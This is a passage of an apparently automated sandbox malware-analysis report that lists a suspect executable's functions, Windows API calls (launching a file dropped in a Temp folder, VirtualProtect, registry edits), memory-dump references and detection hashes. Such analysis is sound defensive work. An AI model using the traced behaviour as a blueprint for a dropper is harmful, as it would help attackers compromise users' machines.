                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Enum$CloseOpenValue
                                        • String ID:
                                        • API String ID: 167947723-0
                                        • Opcode ID: caf030312989360912e564f455c27575c802c45ca4fe6e6e3a31a613e64801eb
                                        • Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
                                        • Opcode Fuzzy Hash: caf030312989360912e564f455c27575c802c45ca4fe6e6e3a31a613e64801eb
                                        • Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A
                                        Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,?), ref: 00401E1E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies, xrefs: 00401E09
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies
                                        • API String ID: 587946157-1144022150
                                        • Opcode ID: 40434b390c6071fab714dcb5d25e8e1443f7045445f963bbe9c0ee784e309111
                                        • Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
                                        • Opcode Fuzzy Hash: 40434b390c6071fab714dcb5d25e8e1443f7045445f963bbe9c0ee784e309111
                                        • Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728
                                        Function 100027EC Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(00000000), ref: 100028AB
                                        • GetLastError.KERNEL32 ref: 100029B2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast
                                        • String ID:
                                        • API String ID: 1214770103-0
                                        • Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                        • Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
                                        • Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                        • Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94
                                        Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004023F8
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 7eb33a159c5e2e36f52cd260ea1f941ce228b1fcd6854e0b7c510fd00de33ed5
                                        • Instruction ID: 6e7bf8a8071b86039a0630bdde8d6c62460c4efec4bb82e40fe4d514ce07d4c8
                                        • Opcode Fuzzy Hash: 7eb33a159c5e2e36f52cd260ea1f941ce228b1fcd6854e0b7c510fd00de33ed5
                                        • Instruction Fuzzy Hash: 6711C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE441B62C0D2B84A41EB6A
                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                        • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                        • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                        • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                        Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID:
                                        • API String ID: 849931509-0
                                        • Opcode ID: 9fe761724c1276d574af105ef08c00a5703bee9f5c9ace5d1d1e19f8a1f69dfd
                                        • Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
                                        • Opcode Fuzzy Hash: 9fe761724c1276d574af105ef08c00a5703bee9f5c9ace5d1d1e19f8a1f69dfd
                                        • Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E
                                        Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00010454), ref: 00401579
                                        • ShowWindow.USER32(0001044E), ref: 0040158E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                        • Instruction ID: 8a385b190166ef4faee7ea7f7faf61a79327429c222f4cee9526e2a72d22cdd5
                                        • Opcode Fuzzy Hash: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                        • Instruction Fuzzy Hash: 9FF0E577B08250BFC725CF64ED8086E77F5EB5531075444BFD102A3292C2B89D04DB18
                                        Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: 3f66373841930f62a7e084ead73e64351eb2d9defc74f476aa24081e3a98abe9
                                        • Instruction ID: 18ac702c75a7039fec00373c4f699ed09bc4c8ec852dd7b5b9a0ef8cb6e9c66a
                                        • Opcode Fuzzy Hash: 3f66373841930f62a7e084ead73e64351eb2d9defc74f476aa24081e3a98abe9
                                        • Instruction Fuzzy Hash: 39E0CD72B04110EBCB10BBB45D4A55E3374DF10359B10443BF501F11C1D2B85C40565D
                                        Function 004059C7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 004059CB
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                        • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                        • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                        • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                        Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,004055BA,?,?,00000000,0040579D,?,?,?,?), ref: 004059A7
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 004059BB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                        • Instruction ID: a98ca5448702c3e829ea1667e49b0be7f6aa4c87fef4348ac0342a167d80fd98
                                        • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                        • Instruction Fuzzy Hash: 19D0C9B2918120EBC2102728AD0889BBF69EB542717018B31F865A22B0C7304C52DAA9
                                        Function 0040223B Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite
                                        • String ID:
                                        • API String ID: 390214022-0
                                        • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                        • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                        • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                        • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                        Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                        • Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
                                        • Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                        • Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69
                                        Function 00405A3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A53
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                        • Instruction ID: 55609983f428609d3339a900fe5ea2c3161a13bcf9e808ef2cae39733250456b
                                        • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                        • Instruction Fuzzy Hash: F7E08C3231025AABDF109EA09C40AEB3B6CEB00760F084432FA14E2040D230E9218FA5
                                        Function 1000270F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000272D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                        • Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
                                        • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                        • Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19
                                        Function 0040227F Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID:
                                        • API String ID: 1096422788-0
                                        • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                        • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                                        • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                        • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                                        Function 00404038 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040404A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
